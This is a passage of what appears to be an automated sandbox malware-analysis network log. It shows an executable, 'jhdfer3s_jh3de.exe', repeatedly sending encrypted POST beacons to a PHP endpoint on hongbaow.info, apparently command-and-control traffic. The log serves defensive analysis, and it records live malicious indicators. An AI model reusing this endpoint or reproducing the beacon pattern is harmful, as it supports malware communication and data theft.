                            server-timing: cfL4;desc="?proto=TCP&rtt=1831&min_rtt=1805&rtt_var=695&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1617728&cwnd=218&unsent_bytes=0&cid=1d5af0928602916e&ts=330&x=0"
                            2025-01-22 07:36:29 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            50192.168.2.449990104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:30 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:36:30 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:36:30 UTC814INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:30 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1OgenctPCQG%2BRE5JR6CuBT3l%2BhqM8v9YXAT8kQY93mpZjr%2FKEQgqcW9r2FnygyT33Lyk92MRIZPvnVbwKGv2EmCjvQPCCIax8jT9rf8LgBiPqmYTJ%2B%2B%2BynyuOBmSrOEw"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf956cf77c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1778&rtt_var=678&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1600000&cwnd=218&unsent_bytes=0&cid=0aa865a47f00e600&ts=354&x=0"
                            2025-01-22 07:36:30 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            51192.168.2.449995104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:30 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:30 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:30 UTC803INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:30 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j93fN7e4h77M4AW6LAA45pJFoA8biyZ7SfxUWzgPGE4vUlTVXNUzDWQL7khldw4uV3O5K%2BHjsYEQP30byH8DfZ1EaTi6uj7WJ6v04qfYza4f3LeCvyqMiEFWhLWgyhBU"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf970e38de95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1439&min_rtt=1432&rtt_var=552&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1955793&cwnd=246&unsent_bytes=0&cid=4e55207af726e8c3&ts=315&x=0"
                            2025-01-22 07:36:30 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            52192.168.2.450001104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:31 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:31 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:31 UTC813INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:31 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1VtarExTcQ%2BKkEq%2FLfEUAvaWgEpvjWWEWp%2BZ%2FGO9jYM1ODdnTcl2pf0%2FgrsU8asqfBFy2iM3YJ8hdPOJA0ihKWAiasFsjhaeSI%2BjMfB2pKFzrYQWcBrLWqfqck1gDPo"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf9e39587c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1761&rtt_var=679&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1588683&cwnd=218&unsent_bytes=0&cid=caf54cbe279c7300&ts=333&x=0"
                            2025-01-22 07:36:31 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            53192.168.2.450011104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:32 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:32 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:34 UTC820INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:34 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVydVfS9KWunb5EHz257GLe%2FIc8EdS%2Fs6SX%2Br88zTTNijaxa8P4K%2FVCRZ%2F8BMzkgqYTxeCFAf5QBjUnDXyiq%2B54LGW6KqMA4XLbLP8VC2UCTabbpIPjTF%2B%2BxBF%2FfYpoJ"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfa4fdc742eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1546&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1808049&cwnd=215&unsent_bytes=0&cid=a8715b7ce70f88d9&ts=1383&x=0"
                            2025-01-22 07:36:34 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            54192.168.2.450023104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:34 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:34 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:35 UTC811INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:35 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aWWeutNfbLTozPz943PwPGqhdY5alZEfecdMHEw%2FhGeETI1D2%2F5MoiY5snbQckpsQUcJynMl%2BudV%2BNfaLYIE80a5IajuK2sohrX%2FqEm4n7qXjwYtwLW8BvTqAy4QrKjb"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfb22b6342eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1529&min_rtt=1518&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1813664&cwnd=215&unsent_bytes=0&cid=fda964c95c5e17aa&ts=329&x=0"
                            2025-01-22 07:36:35 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            55192.168.2.450031104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:35 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:35 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:36 UTC813INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:36 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fLguExuL0l5cMry%2BlrfAk4NnbsF6Bdrf4kSjw3yTRAyDGhkv%2Fyy4b7Wsl0Ha2nzVdjV1mgu%2BSB%2F8gG2qQPPFRyMJiYW8rVRREkkh7HCbkaAgaXt%2Bacn5Hsm9%2BFc1EYLl"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfb8b83dde95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1449&min_rtt=1443&rtt_var=553&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1957104&cwnd=246&unsent_bytes=0&cid=6b93d74ee526d9f5&ts=329&x=0"
                            2025-01-22 07:36:36 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            56192.168.2.450035104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:36 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:36:36 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:36:36 UTC804INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:36 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TAp2hGmIJ77n4jU1tLzGNPFWPcbBTgdZdceD5CDYJ286gYX1KGcDWhlUOBjl4jULM1OJREvcny%2FXPUgaLMdCSCXhZKTOlqeP1X0dCD4JvN1AGrSWU1qEx4BB0FjgVS00"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfb9a8e18ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1787&rtt_var=674&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1620421&cwnd=237&unsent_bytes=0&cid=bc7e5da63b504d63&ts=326&x=0"
                            2025-01-22 07:36:36 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            57192.168.2.450041104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:36 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:36 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:37 UTC805INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:37 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NN7d%2BDCn%2FbM042qxQQ805Q3r9yMWe965ycpMpWXhxkrvvs7NYp9Ea5pmGo9qz0BeQvSrJnsbXVNCum3TSzXI3ySRrhTOvdKOo7wjNX6jMxMDmBJlJpizPkqvVnBvz0g4"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfbf3fddc358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1406&min_rtt=1400&rtt_var=538&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=2006872&cwnd=155&unsent_bytes=0&cid=f517834e03e95f24&ts=354&x=0"
                            2025-01-22 07:36:37 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            58192.168.2.450047104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:37 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:37 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:38 UTC811INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:38 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f17r23GK5oArx%2FAzE3CGt80LaC7oVcOySso8gGx8o0c%2F5sEZxXtC4%2FqlLMquLKjNMn9oeVy5CvipyP208KjfFI1%2Fqo51Um8SSbvnWAFSV6RdAvYQbAs621J6%2FMrhE1Qs"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfc5ac258ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1748&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1628555&cwnd=237&unsent_bytes=0&cid=4b0fd542d3f87455&ts=341&x=0"
                            2025-01-22 07:36:38 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            59192.168.2.450054104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:38 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:38 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:39 UTC815INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:39 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vV7i%2BnMcY5c7n3sGmxoK0NQ7iU%2BUhNrF7T4CBe0ibWlupaTTsfoqJRCZcvthOLHlWrXMLrFsoEB5EMXYT29jlLo%2FfuMJBqkwNdXlV4zOhF%2BQ%2Bnz8A%2FP9hiIW1%2BYQeEEz"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfcbadf18ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1755&rtt_var=672&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1612368&cwnd=237&unsent_bytes=0&cid=20362365e85413f9&ts=335&x=0"
                            2025-01-22 07:36:39 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            60192.168.2.450063104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:39 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:39 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:40 UTC805INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:40 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N6C7PZQJSKbRAg%2BUje3AsT2TlZ49ldfM4XJkiRyURUyNiPLCTjuvxTJzg1OcLfkLcnR2Yt%2FTLh3bPsSiC3xkklWOtaZPLfcvM38l7rjhRf7CPi8sNupyF6tNke6WChV8"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfd1cbe34414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1541&min_rtt=1536&rtt_var=586&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1850443&cwnd=180&unsent_bytes=0&cid=afd2312b46f2907b&ts=341&x=0"
                            2025-01-22 07:36:40 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            61192.168.2.450064104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:40 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
